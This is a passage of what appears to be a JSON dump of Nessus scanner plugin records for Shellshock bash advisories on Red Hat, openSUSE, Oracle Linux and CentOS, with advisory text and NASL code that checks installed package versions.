preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1354\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"rhev-hypervisor6-6.5-20140930.1.el6ev\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rhev-hypervisor6\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:23:26", "description": "- Replace patches bash-4.2-heredoc-eof-delim.patch and bash-4.2-parse-exportfunc.patch with the official upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream patch level bash42-051\n\n - Add patches bash-4.2-heredoc-eof-delim.patch for bsc#898812, CVE-2014-6277: more troubles with functions bash-4.2-parse-exportfunc.patch for bsc#898884, CVE-2014-6278: code execution after original 6271 fix\n\n - Make bash-4.2-extra-import-func.patch an optional patch due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is based on the BSD patch of Christos. As further enhancements the option import-functions is mentioned in the manual page and a shopt switch is added to enable and disable import-functions on the fly", "cvss3": {}, "published": "2014-10-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1310-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-595.NASL", "href": "https://www.tenable.com/plugins/nessus/78591", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-595.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78591);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1310-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- Replace patches bash-4.2-heredoc-eof-delim.patch and\n bash-4.2-parse-exportfunc.patch with the official\n upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream\n patch level bash42-051\n\n - Add patches bash-4.2-heredoc-eof-delim.patch for\n bsc#898812, CVE-2014-6277: more troubles with functions\n bash-4.2-parse-exportfunc.patch for bsc#898884,\n CVE-2014-6278: code execution after original 6271 fix\n\n - Make bash-4.2-extra-import-func.patch an optional patch\n due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch\n bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch\n with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is\n based on the BSD patch of Christos. As further\n enhancements the option import-functions is mentioned in\n the manual page and a shopt switch is added to enable\n and disable import-functions on the fly\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898884\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-10/msg00025.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debuginfo-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debugsource-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-devel-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-lang-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-debuginfo-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-debuginfo-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"readline-devel-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-68.12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo-32bit / bash-debuginfo / bash-debugsource / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:38", "description": "From Red Hat Security Advisory 2014:1294 :\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : bash (ELSA-2014-1294) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2014-1294.NASL", "href": "https://www.tenable.com/plugins/nessus/77849", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:1294 and \n# Oracle Linux Security Advisory ELSA-2014-1294 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77849);\n script_version(\"1.33\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_xref(name:\"RHSA\", value:\"2014:1294\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Oracle Linux 4 : bash (ELSA-2014-1294) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2014:1294 :\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat\nEnterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended\nUpdate Support, Red Hat Enterprise Linux 6.2 Advanced Update Support,\nand Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this\nissue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004473.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"bash-3.0-27.0.1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:36", "description": "Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "CentOS 5 / 6 / 7 : bash (CESA-2014:1293) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bash", "p-cpe:/a:centos:centos:bash-doc", "cpe:/o:centos:centos:5", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2014-1293.NASL", "href": "https://www.tenable.com/plugins/nessus/77835", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1293 and \n# CentOS Errata and Security Advisory 2014:1293 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77835);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_xref(name:\"RHSA\", value:\"2014:1293\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"CentOS 5 / 6 / 7 : bash (CESA-2014:1293) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this\nissue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n # https://lists.centos.org/pipermail/centos-announce/2014-September/020582.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?218f06b1\");\n # https://lists.centos.org/pipermail/centos-announce/2014-September/020583.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f85a2dec\");\n # https://lists.centos.org/pipermail/centos-announce/2014-September/020585.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93307af1\");\n # https://lists.centos.org/pipermail/centos-announce/2014-September/020650.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3adf2ea1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"bash-3.2-33.el5.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-4.1.2-15.el6_5.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-doc-4.1.2-15.el6_5.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:24:21", "description": "The remote host appears to be running SIP. SIP itself is not vulnerable to Shellshock; however, any Bash script that SIP runs for filtering or other routing tasks could potentially be affected if the script exports an environmental variable from the content or headers of a SIP message.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that any scripts the SIP proxy may be running do not create the conditions that are exploitable via the Shellshock flaw.", "cvss3": {}, "published": "2014-11-03T00:00:00", "type": "nessus", "title": "SIP Script Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "SHELLSHOCK_SIP_INVITE.NASL", "href": "https://www.tenable.com/plugins/nessus/78822", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78822);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n 